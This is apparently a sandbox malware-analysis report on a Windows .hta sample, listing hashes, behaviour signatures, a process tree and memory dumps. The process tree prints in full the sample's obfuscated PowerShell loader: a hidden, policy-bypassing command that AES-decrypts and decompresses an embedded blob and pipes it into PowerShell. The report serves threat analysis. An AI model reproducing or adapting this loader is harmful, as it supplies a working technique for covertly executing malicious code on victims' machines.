Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    12/10/2023, 06:57

General

  • Target

    51ab827a541737c3612f61ec35e7c824a8f6df3a1b800dd0748c3f5a9901bc98.hta

  • Size

    1.3MB

  • MD5

    12e11aec09a12f714ccf9ab425ca70e9

  • SHA1

    9dead6076a2dadf2c2b530038bd4c3f6c0eb5aaa

  • SHA256

    51ab827a541737c3612f61ec35e7c824a8f6df3a1b800dd0748c3f5a9901bc98

  • SHA512

    29834691a9ca405b875622f273320699e71e2fab5cf5ef396f6248bfaf4e88836bbfc8817ebeea24f8ea2ebd19df3510bf28b1026a9a1a7d25fd6f32494ae74d

  • SSDEEP

    3072:rsas4u5vq277nFQX1OW9zBvG7+jY8iJgeUeBTfRtqvaZmcI2oZRa/FU:4aRu5vbFQXU653j0JDDDZmcI2oZRaNU

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\51ab827a541737c3612f61ec35e7c824a8f6df3a1b800dd0748c3f5a9901bc98.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $oUjKXXPP = 'AAAAAAAAAAAAAAAAAAAAAMh/3hf4IgQmfspR9EdE6Uau6j1WCjHn5PU9gxaekl+kbHtuzGLYPB4KS64eKTJfmRu5ehXCQCMGsVlYWrjpxFt/b9leZig9m/s3l7f2nOlajok91u4eQq1+tOhDm0/S0nMc5kWyJpGsIfp+0nobSIt+EvyK6zG9GOlo4sixk7yOUbMbh3dfaV+AOctUddFVNmJ/jCXjK5D+3uow4OHzz0He3fDE7yqX9Mf8wK4eEMKApKC2bGDHsPXcUt0gSMuRxAh5NiU47JgoDQsPp3+49WTGpCMx7pV+3jG+9eqC8CjN9tA9HifY9yYlvR1hP+4sX55dPZD9qMvF44/D91H8cDTx/2IIb6QxD8xA42GDktZQjI3W3yMB3zCiOWBji8hfkgXn80thYVtUeYx/gUKfbOgFFIz1sKW7duWrAtscfsJEVGLbs8tlNcJzDS9bBe4a1DIFynVWID++e3+kWaNNXeVR0yDNRHjjFyJ+2ehJLf8C5tPynp6LSRxi/e/JEd32sF5mprohM8td9mDqUYNKglbOIjn8kMPzbxoUoH9iXhZrTwhsg6K9rzopfxP4gwrj916OY7z3oLCfo8SNKQS16ZiS2hdbHxrWbJPlxojm3gNvaz/pKSZ9Mya9mgXPAIYFCnG94IbQh1/KH8J2wikAL25visbXsqwqIk259dDmNtsM+og1aQGwtCEO0fuARgdDdik97R8VVruxgCm8IhIhRUQBPTg/dhiUhOEJ1uF7Q0lUS6L9E7xzqnzVFWb3CVaST6nE37ksaIaVZNwDTVbI4laLq1LnfK7nd9I0OX/KyAW93kkcE6CbMTLAJo2N49WuSyTyRucDVThkSUZdSm1R25k9KxzVuEoX6cYgvhvBqu1hHnHswoq9HfKHCkSDsbhdkW7/WB7gE0qHa3niBxWxI//an3TMnPIX5zy3tMgcBwW80Lel/c63YsRXRHyTSuEUSbW/lH3Ck8WRIoskAH3sQEtkvtpR2/eUdzDs55BowJltvhoeMA1MfKtJujAdJ1MC08q4O2JxxyTgpnbYLgY2KmHuICWsAMWpuKGlebCCepqutrqaKOUfxuZi/GyoT1/V8L5woFux4EMqfbDmwmQResq1f9GpHLW88Kp27MD6cUn/98r3eRXsbE66U6W0Lxci1v86ySLKh3aA6sXEC5Dk0Vg=';$wgQxX = 'RE1ud0xDdnhIZ3dvZlRLWFFLbExvZVNZZ3ZnaGJCd0w=';$MkmLpzdO = New-Object 'System.Security.Cryptography.AesManaged';$MkmLpzdO.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MkmLpzdO.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MkmLpzdO.BlockSize = 128;$MkmLpzdO.KeySize = 256;$MkmLpzdO.Key = [System.Convert]::FromBase64String($wgQxX);$XICaV = [System.Convert]::FromBase64String($oUjKXXPP);$QxfpGTik = $XICaV[0..15];$MkmLpzdO.IV = $QxfpGTik;$bgWQPfldP = $MkmLpzdO.CreateDecryptor();$FQuUUaNPi = $bgWQPfldP.TransformFinalBlock($XICaV, 16, $XICaV.Length - 16);$MkmLpzdO.Dispose();$WDURE = New-Object System.IO.MemoryStream( , $FQuUUaNPi );$heVzth = New-Object System.IO.MemoryStream;$VQZLTCxHY = New-Object System.IO.Compression.GzipStream $WDURE, ([IO.Compression.CompressionMode]::Decompress);$VQZLTCxHY.CopyTo( $heVzth );$VQZLTCxHY.Close();$WDURE.Close();[byte[]] $IhzJwjj = $heVzth.ToArray();$iuvXSZ = [System.Text.Encoding]::UTF8.GetString($IhzJwjj);$iuvXSZ | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $oUjKXXPP = 'AAAAAAAAAAAAAAAAAAAAAMh/3hf4IgQmfspR9EdE6Uau6j1WCjHn5PU9gxaekl+kbHtuzGLYPB4KS64eKTJfmRu5ehXCQCMGsVlYWrjpxFt/b9leZig9m/s3l7f2nOlajok91u4eQq1+tOhDm0/S0nMc5kWyJpGsIfp+0nobSIt+EvyK6zG9GOlo4sixk7yOUbMbh3dfaV+AOctUddFVNmJ/jCXjK5D+3uow4OHzz0He3fDE7yqX9Mf8wK4eEMKApKC2bGDHsPXcUt0gSMuRxAh5NiU47JgoDQsPp3+49WTGpCMx7pV+3jG+9eqC8CjN9tA9HifY9yYlvR1hP+4sX55dPZD9qMvF44/D91H8cDTx/2IIb6QxD8xA42GDktZQjI3W3yMB3zCiOWBji8hfkgXn80thYVtUeYx/gUKfbOgFFIz1sKW7duWrAtscfsJEVGLbs8tlNcJzDS9bBe4a1DIFynVWID++e3+kWaNNXeVR0yDNRHjjFyJ+2ehJLf8C5tPynp6LSRxi/e/JEd32sF5mprohM8td9mDqUYNKglbOIjn8kMPzbxoUoH9iXhZrTwhsg6K9rzopfxP4gwrj916OY7z3oLCfo8SNKQS16ZiS2hdbHxrWbJPlxojm3gNvaz/pKSZ9Mya9mgXPAIYFCnG94IbQh1/KH8J2wikAL25visbXsqwqIk259dDmNtsM+og1aQGwtCEO0fuARgdDdik97R8VVruxgCm8IhIhRUQBPTg/dhiUhOEJ1uF7Q0lUS6L9E7xzqnzVFWb3CVaST6nE37ksaIaVZNwDTVbI4laLq1LnfK7nd9I0OX/KyAW93kkcE6CbMTLAJo2N49WuSyTyRucDVThkSUZdSm1R25k9KxzVuEoX6cYgvhvBqu1hHnHswoq9HfKHCkSDsbhdkW7/WB7gE0qHa3niBxWxI//an3TMnPIX5zy3tMgcBwW80Lel/c63YsRXRHyTSuEUSbW/lH3Ck8WRIoskAH3sQEtkvtpR2/eUdzDs55BowJltvhoeMA1MfKtJujAdJ1MC08q4O2JxxyTgpnbYLgY2KmHuICWsAMWpuKGlebCCepqutrqaKOUfxuZi/GyoT1/V8L5woFux4EMqfbDmwmQResq1f9GpHLW88Kp27MD6cUn/98r3eRXsbE66U6W0Lxci1v86ySLKh3aA6sXEC5Dk0Vg=';$wgQxX = 'RE1ud0xDdnhIZ3dvZlRLWFFLbExvZVNZZ3ZnaGJCd0w=';$MkmLpzdO = New-Object 'System.Security.Cryptography.AesManaged';$MkmLpzdO.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MkmLpzdO.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MkmLpzdO.BlockSize = 128;$MkmLpzdO.KeySize = 256;$MkmLpzdO.Key = [System.Convert]::FromBase64String($wgQxX);$XICaV = [System.Convert]::FromBase64String($oUjKXXPP);$QxfpGTik = $XICaV[0..15];$MkmLpzdO.IV = $QxfpGTik;$bgWQPfldP = $MkmLpzdO.CreateDecryptor();$FQuUUaNPi = $bgWQPfldP.TransformFinalBlock($XICaV, 16, $XICaV.Length - 16);$MkmLpzdO.Dispose();$WDURE = New-Object System.IO.MemoryStream( , $FQuUUaNPi );$heVzth = New-Object System.IO.MemoryStream;$VQZLTCxHY = New-Object System.IO.Compression.GzipStream $WDURE, ([IO.Compression.CompressionMode]::Decompress);$VQZLTCxHY.CopyTo( $heVzth );$VQZLTCxHY.Close();$WDURE.Close();[byte[]] $IhzJwjj = $heVzth.ToArray();$iuvXSZ = [System.Text.Encoding]::UTF8.GetString($IhzJwjj);$iuvXSZ | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $oUjKXXPP = 'AAAAAAAAAAAAAAAAAAAAAMh/3hf4IgQmfspR9EdE6Uau6j1WCjHn5PU9gxaekl+kbHtuzGLYPB4KS64eKTJfmRu5ehXCQCMGsVlYWrjpxFt/b9leZig9m/s3l7f2nOlajok91u4eQq1+tOhDm0/S0nMc5kWyJpGsIfp+0nobSIt+EvyK6zG9GOlo4sixk7yOUbMbh3dfaV+AOctUddFVNmJ/jCXjK5D+3uow4OHzz0He3fDE7yqX9Mf8wK4eEMKApKC2bGDHsPXcUt0gSMuRxAh5NiU47JgoDQsPp3+49WTGpCMx7pV+3jG+9eqC8CjN9tA9HifY9yYlvR1hP+4sX55dPZD9qMvF44/D91H8cDTx/2IIb6QxD8xA42GDktZQjI3W3yMB3zCiOWBji8hfkgXn80thYVtUeYx/gUKfbOgFFIz1sKW7duWrAtscfsJEVGLbs8tlNcJzDS9bBe4a1DIFynVWID++e3+kWaNNXeVR0yDNRHjjFyJ+2ehJLf8C5tPynp6LSRxi/e/JEd32sF5mprohM8td9mDqUYNKglbOIjn8kMPzbxoUoH9iXhZrTwhsg6K9rzopfxP4gwrj916OY7z3oLCfo8SNKQS16ZiS2hdbHxrWbJPlxojm3gNvaz/pKSZ9Mya9mgXPAIYFCnG94IbQh1/KH8J2wikAL25visbXsqwqIk259dDmNtsM+og1aQGwtCEO0fuARgdDdik97R8VVruxgCm8IhIhRUQBPTg/dhiUhOEJ1uF7Q0lUS6L9E7xzqnzVFWb3CVaST6nE37ksaIaVZNwDTVbI4laLq1LnfK7nd9I0OX/KyAW93kkcE6CbMTLAJo2N49WuSyTyRucDVThkSUZdSm1R25k9KxzVuEoX6cYgvhvBqu1hHnHswoq9HfKHCkSDsbhdkW7/WB7gE0qHa3niBxWxI//an3TMnPIX5zy3tMgcBwW80Lel/c63YsRXRHyTSuEUSbW/lH3Ck8WRIoskAH3sQEtkvtpR2/eUdzDs55BowJltvhoeMA1MfKtJujAdJ1MC08q4O2JxxyTgpnbYLgY2KmHuICWsAMWpuKGlebCCepqutrqaKOUfxuZi/GyoT1/V8L5woFux4EMqfbDmwmQResq1f9GpHLW88Kp27MD6cUn/98r3eRXsbE66U6W0Lxci1v86ySLKh3aA6sXEC5Dk0Vg=';$wgQxX = 'RE1ud0xDdnhIZ3dvZlRLWFFLbExvZVNZZ3ZnaGJCd0w=';$MkmLpzdO = New-Object 'System.Security.Cryptography.AesManaged';$MkmLpzdO.Mode = [System.Security.Cryptography.CipherMode]::ECB;$MkmLpzdO.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$MkmLpzdO.BlockSize = 128;$MkmLpzdO.KeySize = 256;$MkmLpzdO.Key = [System.Convert]::FromBase64String($wgQxX);$XICaV = [System.Convert]::FromBase64String($oUjKXXPP);$QxfpGTik = $XICaV[0..15];$MkmLpzdO.IV = $QxfpGTik;$bgWQPfldP = $MkmLpzdO.CreateDecryptor();$FQuUUaNPi = $bgWQPfldP.TransformFinalBlock($XICaV, 16, $XICaV.Length - 16);$MkmLpzdO.Dispose();$WDURE = New-Object System.IO.MemoryStream( , $FQuUUaNPi );$heVzth = New-Object System.IO.MemoryStream;$VQZLTCxHY = New-Object System.IO.Compression.GzipStream $WDURE, ([IO.Compression.CompressionMode]::Decompress);$VQZLTCxHY.CopyTo( $heVzth );$VQZLTCxHY.Close();$WDURE.Close();[byte[]] $IhzJwjj = $heVzth.ToArray();$iuvXSZ = [System.Text.Encoding]::UTF8.GetString($IhzJwjj);$iuvXSZ
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2552
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T38LFKEJ1NFNJ4TYNQO3.temp

    Filesize

    7KB

    MD5

    d56b642070e9af23214f5b322a6290a8

    SHA1

    7f8ee1a82c1ce0f8ffdcc0d75f40b1e41ad43816

    SHA256

    1c336ee780759dbca303a1548d4061081164c95c1ce9a33fa7c666fcafdb61b1

    SHA512

    42d6b0bafa09b8fbf6e229a9c92e2709fe565df9cb10cf19cb78903c0e404e08ea73e3ee13540225835b2a0d7cd7a59f2ca8ee29aaebef4428113971315b624c

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d56b642070e9af23214f5b322a6290a8

    SHA1

    7f8ee1a82c1ce0f8ffdcc0d75f40b1e41ad43816

    SHA256

    1c336ee780759dbca303a1548d4061081164c95c1ce9a33fa7c666fcafdb61b1

    SHA512

    42d6b0bafa09b8fbf6e229a9c92e2709fe565df9cb10cf19cb78903c0e404e08ea73e3ee13540225835b2a0d7cd7a59f2ca8ee29aaebef4428113971315b624c

  • memory/2384-5-0x0000000001D40000-0x0000000001D80000-memory.dmp

    Filesize

    256KB

  • memory/2384-2-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2384-6-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2384-4-0x0000000001D40000-0x0000000001D80000-memory.dmp

    Filesize

    256KB

  • memory/2384-3-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2552-17-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2552-18-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2552-19-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2552-20-0x0000000002750000-0x0000000002790000-memory.dmp

    Filesize

    256KB

  • memory/2552-23-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-21-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-22-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB

  • memory/2816-24-0x0000000074230000-0x00000000747DB000-memory.dmp

    Filesize

    5.7MB